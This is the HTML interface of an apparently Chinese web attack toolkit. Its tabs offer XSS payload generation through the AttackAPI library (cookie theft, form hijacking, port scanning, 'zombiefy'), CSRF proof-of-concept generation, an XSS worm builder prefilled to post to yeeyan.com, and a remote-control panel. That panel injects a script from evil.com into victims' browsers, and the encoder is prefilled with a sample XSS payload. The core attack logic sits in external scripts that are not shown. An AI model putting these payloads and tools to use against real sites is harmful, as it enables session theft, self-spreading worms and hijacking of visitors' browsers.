<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!--版权代码-->

 <style type="text/css">
             body {
                padding: 0;
                margin: 0px 0px 0px 0px;
            }

            #footer {
                height: 40px;
                line-height: 40px;
                position: fixed;
                bottom: 0;
                width: 100%;
                text-align: center;
                background: #333;
                color: #fff;
                font-family: Arial;
                font-size: 12px;
                letter-spacing: 1px;
				left:-10;
				right:0;
            }

            .content {
                height: 1800px;
                width: 100%;
                text-align: center;
            }
        </style>
<!--版权代码-->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>在线转换</title>
<link href="style/main.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="lib/jquery.js"></script>
<script type="text/javascript" src="lib/core.js"></script>
<script type="text/javascript" src="basic.js"></script>
<script type="text/javascript" src="lib/attack.js"></script>
<script type="text/javascript" src="lib/encode.js"></script>
<script type="text/javascript" src="lib/worm.js"></script>
<script type="text/javascript" src="../dist/tctip-1.0.2.js"></script>
<script></script>
<!--在线打赏-->
 <script src="http://static.tctip.com/tctip-1.0.2.min.js"></script>
  <script>  
  new tctip({
    top: '20%',
    button: {
      id: 9,
      type: 'dashang',
    },
    list: [
      {
        type: 'alipay',
        qrImg: 'https://images2018.cnblogs.com/blog/1335842/201807/1335842-20180711203522019-1297690653.png'
      }, {
        type: 'wechat',
        qrImg: 'https://images2018.cnblogs.com/blog/1335842/201807/1335842-20180711203352880-579298001.png'
      }
    ]
  }).init()
  </script>
<!--打赏结束-->

<!--右侧悬浮代码-->











<!--右侧悬浮部分代码结束-->
</head>

<body>
 
<div id="header">
   <div class="wrapper">
   <div id="mainsearch">
    <style>
	
.go_search {width: 500px;}
.go_search .gsc-input td,.go_search .gsc-input tddiv {padding:0 0 0 0;margin:0 0 0 0;height:23px;}
.go_search .gsc-input input:focus{ 
border:none;

}
.go_search .gsc-input input {
	border:none;
	height:23px;
	width: 100%;
	padding: 0px;
	border: none;
	margin: 0px;
	height: auto;
	outline: none;
	-webkit-box-shadow:none;
    -moz-box-shadow:none;
    box-shadow:none;
	background-image: url(../img/google_custom_search_watermark.gif?20140625);
	background-color: rgb(255, 255, 255);
	background-position: 0% 50%;
	background-repeat: no-repeat no-repeat;
}
	</style>  
	<div class="go_search">
	<!--place this tag where you want the search box render-->
	</div>
   </div>
   <div style="margin:0 auto; width:980px">
    <h2>在线转码工具</h2>
   </div>
   </div>
</div>
<span id="sys_tip">正在加载……</span>
<div id="Ww_BOX">
	<div id="Ww_Head">
		<ul id="Db_MainNav">
		    <li><a href="javascript:void(0);" id="_0">Encode/Decode</a></li>
			<li><a href="javascript:void(0);" id="_1">XSS</a></li>
			<li><a href="javascript:void(0);" id="_4">CSRF</a></li>
			<li><a href="javascript:void(0);" id="_5">About</a></li>					
		</ul>
	</div>
	<div id="Ww_Body">
		<!--Encode/Decode-->
		<div id="Ww_B_0" class="Ww_B">
			<div id="Ww_B_0_Left">
				<textarea id="Ww_B_0_textarea"><script>x=alert;x(/xssor/.source);</script></textarea>
			</div>
			<div id="Ww_B_0_Right">
				<input type="button" name="rwb_b2" value="→16en" onclick="knownxss.encode.en(16)" /><input type="button" name="rwb_b2_j" value="De" onclick="knownxss.encode.de(16)" /><input type="radio" name="rwb_b2_c" id="rwb_b2_c1" checked="checked" />\u<input type="radio" name="rwb_b2_c" id="rwb_b2_c2" />&amp;#x;
				<br /><br />
				<input type="button" name="rwb_b1" value="→10en" onclick="knownxss.encode.en(10)" /><input type="button" name="rwb_b1_j" value="De" onclick="knownxss.encode.de(10)" /><input type="radio" name="rwb_b1_c" id="rwb_b1_c1" checked="checked" />,<input type="radio" name="rwb_b1_c" id="rwb_b1_c2" />&amp;#<input type="radio" name="rwb_b1_c" id="rwb_b1_c3" />&amp;#;
				<br /><br />
				<input type="button" name="rwb_b3" value="escape" onclick="knownxss.encode._escape()" /> <span style="font-size:18px">&harr;</span> <input type="button" name="rwb_b3j" value="unescape" onclick="knownxss.encode._unescape()" />
				<br /><br />
				<input type="button" name="rwb_b4" value="encodeURI" onclick="knownxss.encode._encodeURI()" /> <span style="font-size:18px">&harr;</span> <input type="button" name="rwb_b4j" value="decodeURI" onclick="knownxss.encode._decodeURI()" />
				<br /><br />
				<input type="button" name="rwb_b5" value="Html2JS" onclick="knownxss.encode.html2js(1)" /> <span style="font-size:18px">&harr;</span> <input type="button" name="rwb_b5j" value="JS2Html" onclick="knownxss.encode.html2js(2)" />
				<br /><br />
				<input type="button" name="rwb_b6" value="HtmlEncode" onclick="knownxss.encode.htmlencode(1)" /> <span style="font-size:18px">&harr;</span> <input type="button" name="rwb_b6j" value="HtmlDecode" onclick="knownxss.encode.htmlencode(2)" />
				<br /><br />
				<input type="button" name="rwb_b7" value="base64En" onclick="knownxss.encode.base64Code(1)" /> <span style="font-size:18px">&harr;</span> <input type="button" name="rwb_b7j" value="base64De" onclick="knownxss.encode.base64Code(2)" />
				<br /><br />
				<input type="button" value="clear codz" onclick="_g('Ww_B_0_textarea').value='';" /><br />
				</div>
		</div>
		<!--XSSCodz-->	
		<div id="Ww_B_1" class="Ww_B">
			<div id="Ww_B_1_Top">
				<select style="width:240px" onchange="knownxss.xss_codz.attack_api(this.options[selectedIndex].value)" name="attackapi">
				  <option value="">AttackAPI LIB</option>
				  <option value="AttackAPI.core.bindFunction">.core.bindFunction</option>
				  <option value="AttackAPI.core.clone">.core.clone</option>
				  <option value="AttackAPI.core.extend">.core.extend</option>
				  <option value="AttackAPI.dom.attachEvent">.dom.attachEvent</option>
				  <option value="AttackAPI.dom.delCookie">.dom.delCookie</option>
				  <option value="AttackAPI.dom.freeze">.dom.freeze</option>
				  <option value="AttackAPI.dom.getAgent">.dom.getAgent</option>
				  <option value="AttackAPI.dom.getClipboard">.dom.getClipboard</option>
				  <option value="AttackAPI.dom.getCookie">.dom.getCookie</option>
				  <option value="AttackAPI.dom.getCookies">.dom.getCookies</option>
				  <option value="AttackAPI.dom.getDocument">.dom.getDocument</option>
				  <option value="AttackAPI.dom.getInternalHostname">.dom.getInternalHostname</option>
				  <option value="AttackAPI.dom.getInternalIP">.dom.getInternalIP</option>
				  <option value="AttackAPI.dom.getInternalNetworkInfo">.dom.getInternalNetworkInfo</option>
				  <option value="AttackAPI.dom.getPlatform">.dom.getPlatform</option>
				  <option value="AttackAPI.dom.getPlugins">.dom.getPlugins</option>
				  <option value="AttackAPI.dom.getXHR">.dom.getXHR</option>
				  <option value="AttackAPI.dom.hijackEval">.dom.hijackEval</option>
				  <option value="AttackAPI.dom.hijackForm">.dom.hijackForm</option>
				  <option value="AttackAPI.dom.hijackView">.dom.hijackView</option>
				  <option value="AttackAPI.dom.include">.dom.include</option>
				  <option value="AttackAPI.dom.parseXML">.dom.parseXML</option>
				  <option value="AttackAPI.dom.request">.dom.request</option>
				  <option value="AttackAPI.dom.requestCSRF">.dom.requestCSRF</option>
				  <option value="AttackAPI.dom.requestIMG">.dom.requestIMG</option>
				  <option value="AttackAPI.dom.requestIMGL">.dom.requestIMGL</option>
				  <option value="AttackAPI.dom.requestJS">.dom.requestJS</option>
				  <option value="AttackAPI.dom.requestJSL">.dom.requestJSL</option>
				  <option value="AttackAPI.dom.requestJSON">.dom.requestJSON</option>
				  <option value="AttackAPI.dom.requestLC">.dom.requestLC</option>
				  <option value="AttackAPI.dom.requestXML">.dom.requestXML</option>
				  <option value="AttackAPI.dom.requestXSS">.dom.requestXSS</option>
				  <option value="AttackAPI.dom.requestXSSL">.dom.requestXSSL</option>
				  <option value="AttackAPI.dom.scanExtensions">.dom.scanExtensions</option>
				  <option value="AttackAPI.dom.scanHistory">.dom.scanHistory</option>
				  <option value="AttackAPI.dom.scanPorts">.dom.scanPorts</option>
				  <option value="AttackAPI.dom.searchGoogle">.dom.searchGoogle</option>
				  <option value="AttackAPI.dom.setClipboard">.dom.setClipboard</option>
				  <option value="AttackAPI.dom.setCookie">.dom.setCookie</option>
				  <option value="AttackAPI.dom.signatures">.dom.signatures</option>
				  <option value="AttackAPI.dom.spawnChannel">.dom.spawnChannel</option>
				  <option value="AttackAPI.dom.spawnSandbox">.dom.spawnSandbox</option>
				  <option value="AttackAPI.dom.spawnZombie">.dom.spawnZombie</option>
				  <option value="AttackAPI.dom.spider">.dom.spider</option>
				  <option value="AttackAPI.dom.sweepPorts">.dom.sweepPorts</option>
				  <option value="AttackAPI.dom.transport">.dom.transport</option>
				  <option value="AttackAPI.dom.triggerEvent">.dom.triggerEvent</option>
				  <option value="AttackAPI.dom.zombiefy">.dom.zombiefy</option>
				  <option value="AttackAPI.dom.zombiefyL">.dom.zombiefyL</option>
				  <option value="AttackAPI.utils.buildDomain">.utils.buildDomain</option>
				  <option value="AttackAPI.utils.buildJSON">.utils.buildJSON</option>
				  <option value="AttackAPI.utils.buildQuery">.utils.buildQuery</option>
				  <option value="AttackAPI.utils.buildURL">.utils.buildURL</option>
				  <option value="AttackAPI.utils.decodeBase64">.utils.decodeBase64</option>
				  <option value="AttackAPI.utils.decodeURL">.utils.decodeURL</option>
				  <option value="AttackAPI.utils.encodeBase64">.utils.encodeBase64</option>
				  <option value="AttackAPI.utils.encodeMD5">.utils.encodeMD5</option>
				  <option value="AttackAPI.utils.encodeURL">.utils.encodeURL</option>
				  <option value="AttackAPI.utils.ip2number">.utils.ip2number</option>
				  <option value="AttackAPI.utils.net2range">.utils.net2range</option>
				  <option value="AttackAPI.utils.number2ip">.utils.number2ip</option>
				  <option value="AttackAPI.utils.packJS">.utils.packJS</option>
				  <option value="AttackAPI.utils.parseDomain">.utils.parseDomain</option>
				  <option value="AttackAPI.utils.parseJSON">.utils.parseJSON</option>
				  <option value="AttackAPI.utils.parseQuery">.utils.parseQuery</option>
				  <option value="AttackAPI.utils.parseURL">.utils.parseURL</option>
				  <option value="AttackAPI.utils.range2net">.utils.range2net</option>
				</select>
				<br />
				<textarea id="Ww_B_1_textarea"></textarea>
			</div>
				<br />
			<div id="Ww_B_1_Bottom">
			<textarea id="XSSCodz_textarea"></textarea>
			<script>knownxss.xss_codz.lib();</script>
			</div>
		</div>
		<!--WormAction-->
		<div id="Ww_B_2" class="Ww_B">
			<div id="Ww_B_2_Left">
				<textarea id="Ww_B_2_textarea">src="http://www.yeeyan.com/groups/newTopic/"
title="xss"
content="from xss worm:)"</textarea>
			</div>
			<div id="Ww_B_2_Right">
				<select style="width:262px" onchange="knownxss.worm.setWorm(this.options[selectedIndex].value)" name="set_Worm" id="set_Worm">
					<option value="">Content-Type</option>
					<option value="1">multipart/form-data</option>
					<option value="2">application/x-www-form-urlencoded</option>
				</select>
				<br /><br />
				<input type="button" value="reset" onclick="knownxss.worm.reset_Worm()" />
			</div>
		</div>
		<!--RemoteControl-->
		<div id="Ww_B_3" class="Ww_B">
			<div id="Ww_B_3_Top">
				<div id="cmd_div_left">
				<textarea id="cmd" name="cmd">injectScript('http://www.evil.com:8888/web2ghost/lib/inject.js');
setTimeout("injectIframe('http://www.baidu.com')",1000);
</textarea>
				</div>
				<div id="cmd_div_right">
					<input type="text" id="victim_id" name="victim_id" value="victim id" />
					<div id="victim_list"></div>
				</div>
				<br />
				<input type="button" onclick="knownxss.core.create_cmd();" value="inject your xss!" /><br /><br />
			</div>
			<div id="Ww_B_3_Bottom">
			
			</div>
		</div>
		<!--CSRFCodz-->
		<div id="Ww_B_4" class="Ww_B">
			<div id="Ww_B_4_Top">
				<select style="width:92px" onchange="if(this.value==0){_g('csrflang').disabled=true;}else{_g('csrflang').disabled=false;}" id="csrftype" name="csrftype">
				  <option value="null">CSRF Type</option>
				  <option value="0">GET</option>
				  <option value="1">POST</option>
				 </select>
				 <select style="width:120px" id="csrflang" name="csrflang">
				  <option value="null">CSRF Language</option>
				  <option value="js">JavaScript</option>
				  <option value="as">Flash AS3</option>
				  <option value="asp">ASP</option>
				  <option value="php">PHP</option>
				  <option value="py">Python</option>
				 </select>
				 <input type="button" style="width:160px!important;width:162px;" onclick="knownxss.csrf_codz.lib();" value="create your csrf!" />
				<br />
				<input type="text" id="csrfurl" name="csrfurl" value="http://site/submit.php" />
				<input type="text" id="csrfvalue" name="csrfvalue" value="name1=value1&name2=value2" />
				<br />
				<textarea id="Ww_B_4_textarea"></textarea>
			</div>
				<br />
			<div id="Ww_B_4_Bottom">
			<select disabled="disabled" style="width:170px" id="cd_get" name="cd_get">
			  <option value="null">跨域获取数据</option>
			  <option value="as">Flash AS3</option>
			  <option value="asp">ASP</option>
			  <option value="php">PHP</option>
			  <option value="py">Python</option>
			  <option value="json">JSON Hijacking</option>
			</select>
			<br />
			<textarea id="csrf_textarea"></textarea>
			</div>
		</div>
		<!--About-->
		<div id="Ww_B_5" class="Ww_B">
			<div id="Ww_B_5_Top">

		<!--EOF-->
	</div>
</div>
<script>_g("sys_tip").style.display = "none";</script>
<canvas id="canvas"></canvas>


<script type="text/javascript">


/* 鼠标特效 */ 
var a_idx = 0; 
jQuery(document).ready(function($) { 
    $("body").click(function(e) { 
        var a = new Array("富强","民主","文明","和谐","自由","平等","公正","法治","爱国","敬业","诚信","友善"); 
        var $i = $("<span></span>").text(a[a_idx]); 
        a_idx = (a_idx + 1) % a.length; 
        var x = e.pageX, 
        y = e.pageY; 
        $i.css({ 
            "z-index": 999999999999999999999999999999999999999999999999999999999999999999999, 
            "top": y - 20, 
            "left": x, 
            "position": "absolute", 
            "font-weight": "bold", 
            "color": "rgb("+~~(255*Math.random())+","+~~(255*Math.random())+","+~~(255*Math.random())+")" 
        }); 
        $("body").append($i); 
        $i.animate({ 
            "top": y - 180, 
            "opacity": 0 
        }, 
        1500, 
        function() { 
            $i.remove(); 
        }); 
    }); 
}); 
</script>


<!--鼠标特效代码放置于</body>上方-->

<script>

!function(){

function n(n,e,t){

return n.getAttribute(e)||t

}

function e(n){

return document.getElementsByTagName(n)

}

function t(){

var t=e("script"),o=t.length,i=t[o-1];

return{

l:o,z:n(i,"zIndex",-1),o:n(i,"opacity",.5),c:n(i,"color","0,0,0"),n:n(i,"count",99)

}

}

function o(){

a=m.width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth,

c=m.height=window.innerHeight||document.documentElement.clientHeight||document.body.clientHeight

}

function i(){

r.clearRect(0,0,a,c);

var n,e,t,o,m,l;

s.forEach(function(i,x){

for(i.x+=i.xa,i.y+=i.ya,i.xa*=i.x>a||i.x<0?-1:1,i.ya*=i.y>c||i.y<0?-1:1,r.fillRect(i.x-.5,i.y-.5,1,1),e=x+1;e<u.length;e++)n=u[e],

null!==n.x&&null!==n.y&&(o=i.x-n.x,m=i.y-n.y,

l=o*o+m*m,l<n.max&&(n===y&&l>=n.max/2&&(i.x-=.03*o,i.y-=.03*m),

t=(n.max-l)/n.max,r.beginPath(),r.lineWidth=t/2,r.strokeStyle="rgba("+d.c+","+(t+.2)+")",r.moveTo(i.x,i.y),r.lineTo(n.x,n.y),r.stroke()))

}),

x(i)

}

var a,c,u,m=document.createElement("canvas"),

d=t(),l="c_n"+d.l,r=m.getContext("2d"),

x=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||

function(n){

window.setTimeout(n,1e3/45)

},

w=Math.random,y={x:null,y:null,max:2e4};m.id=l,m.style.cssText="position:fixed;top:0;left:0;z-index:"+d.z+";opacity:"+d.o,e("body")[0].appendChild(m),o(),window.onresize=o,

window.onmousemove=function(n){

n=n||window.event,y.x=n.clientX,y.y=n.clientY

},

window.onmouseout=function(){

y.x=null,y.y=null

};

for(var s=[],f=0;d.n>f;f++){

var h=w()*a,g=w()*c,v=2*w()-1,p=2*w()-1;s.push({x:h,y:g,xa:v,ya:p,max:6e3})

}

u=s.concat([y]),

setTimeout(function(){i()},100)

}();

</script>
<!--鼠标特效结束-->

 </div>
</div>
<!--尾部footer开始-->
 <div id="footer">CopyRight@copy2018. All Rights Reserved. Current version is 1.10 power by 落花四月</div>
<!--尾部footer结束-->


 <!--分享功能-->



 
 
<!--分享结束-->

<!--右侧悬浮下部分开始-->





<script type="text/javascript" src="js/jquery.min.js"></script>
<style type="text/css">
	body{
		position: relative;
		background: #EFF2F4;
		font: normal 13px "宋体" !important;
	}
	body,div,ul,li,p,a,img{
		padding: 0;
		margin: 0;
	}
	/*右侧悬浮菜单*/
	.slide{
		width: 50px;
		height: 250px;
		position: fixed;
		top: 50%;
		margin-top: -126px;
		background: #018D75;
		right: 0;
		border-radius: 5px 0 0 5px;
		z-index: 999;
	}
	.slide ul{
		list-style: none;
	}
	.slide .icon li{
		width: 49px;
		height: 50px;
		background: url(img/icon.png) no-repeat;
	}
	.slide .icon .up{
		background-position:-330px -120px ;
	}
	.slide .icon li.qq{
		background-position:-385px -73px ;
	}
	.slide .icon li.tel{
		background-position:-385px -160px ;
	}
	.slide .icon li.wx{
		background-position:-385px -120px ;
	}
	.slide .icon li.down{
		background-position:-330px -160px ;
	}
	.slide .info{
		top: 50%;
		height: 147px;
		position: absolute;
		right: 100%;
		background: #018D75;
		width: 0px;
		overflow: hidden;
		margin-top: -73.5px;
		transition:0.5s;
		border-radius:4px 0 0 4px ;
	}
	.slide .info.hover{
		width: 145px;
		
	}
	.slide .info li{
		width: 145px;
		color: #CCCCCC;
		text-align: center;
	}
	.slide .info li p{
		font-size: 1.1em;
		line-height: 2em;
		padding: 15px;
		text-align: left;
	}
	.slide .info li.qq p a{
		display: block;
		margin-top: 12px;
		width: 100px;
		height: 32px;
		line-height: 32px;
		color: #00DFB9;
		font-size: 16px;   
		text-align: center;
		text-decoration: none;
		border: 1px solid #00DFB9;
		border-radius: 5px;
	}
	.slide .info li.qq p a:hover{
		color: #FFFFFF;
		border: none;
		background: #00E0DB;
	}
	.slide .info li div.img{
		height: 100%;
		background: #DEFFF9;
		margin: 15px;
	}
	.slide .info li div.img img{
		width: 100%;
		height: 100%;
	}
	/*控制菜单的按钮*/
	.index_cy{
		width: 30px;
		height: 30px;
		background: url(img/index_cy.png);
		position: fixed;
		right: 0;
		top: 50%;
		margin-top: 140px;
		background-position: 62px 0;
		cursor: pointer;
	}
	.index_cy2{
		width: 30px;
		height: 30px;
		background: url(img/index_cy.png);
		position: fixed;
		right: 0;
		top: 50%;
		margin-top: 140px;
		background-position: 30px 0;
		cursor: pointer;
	}
	
	/*自适应 当屏小于1050时隐藏*/
	@media screen and (max-width: 1050px) {
		.slide{
			display: none;
		}
		#btn{
			display: none;
		}
		
	}
</style>





















<!--右侧悬浮菜单-->
　<!--蒲公英-->
　　<div class="dandelion">
　　<span class="smalldan"></span>
　　<span class="bigdan"></span>
　　</div>
 
　　<style type="text/css">
　　@media screen and (max-width:600px){
　　.dandelion{display: none !important;}
　　}
　　.dandelion .smalldan {
　　width: 36px;
　　height: 60px;
　　left: 21px;
　　background-position: 0 -90px;
　　border: 0px solid red;
　　}
　　.dandelion span {
　　-webkit-animation: ball-x 3s linear 2s infinite;
　　-moz-animation: ball-x 3s linear 2s infinite;
　　animation: ball-x 3s linear 2s infinite;
　　-webkit-transform-origin: bottom center;
　　-moz-transform-origin: bottom center;
　　transform-origin: bottom center;
　　}
　　.dandelion span {
　　display: block;
　　position: fixed;
　　z-index:9999999999;
　　bottom: 0px;
　　background-image: url(http://www.doubiseo.com/images/pgy.png);
　　background-repeat: no-repeat;
　　_background: none;
　　}
　　.dandelion .bigdan {
　　width: 64px;
　　height: 115px;
　　left: 47px;
　　background-position: -86px -36px;
　　border: 0px solid red;
　　}
　　@keyframes ball-x {
　　0% { transform:rotate(0deg);}
　　20% { transform:rotate(5deg); }
　　40% { transform:rotate(0deg);}
　　60% { transform:rotate(-5deg);}
　　80% { transform:rotate(0deg);}
　　100% { transform:rotate(0deg);}
　　}
　　@-webkit-keyframes ball-x {
　　0% { -webkit-transform:rotate(0deg);}
　　20% { -webkit-transform:rotate(5deg); }
　　40% { -webkit-transform:rotate(0deg);}
　　60% { -webkit-transform:rotate(-5deg);}
　　80% { -webkit-transform:rotate(0deg);}
　　100% { -webkit-transform:rotate(0deg);}
　　}
　　@-moz-keyframes ball-x {
　　0% { -moz-transform:rotate(0deg);}
　　20% { -moz-transform:rotate(5deg); }
　　40% { -moz-transform:rotate(0deg);}
　　60% { -moz-transform:rotate(-5deg);}
　　80% { -moz-transform:rotate(0deg);}
　　100% { -moz-transform:rotate(0deg);}
　　}
　　</style>

<!--右侧悬浮结束-->

</body>
</html>
